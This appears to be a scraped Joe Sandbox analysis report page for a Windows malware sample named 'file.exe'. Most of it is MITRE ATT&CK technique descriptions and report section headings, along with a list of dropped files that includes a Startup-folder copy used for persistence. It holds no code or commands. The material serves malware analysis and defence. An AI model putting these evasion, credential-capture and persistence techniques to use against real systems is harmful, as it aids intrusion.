Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Spreading

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\tmp.bat

C:\Users\user\AppData\Local\Temp\tmp.ini

C:\Users\user\AppData\Local\Temp\tmp.txt

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
file.exe

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre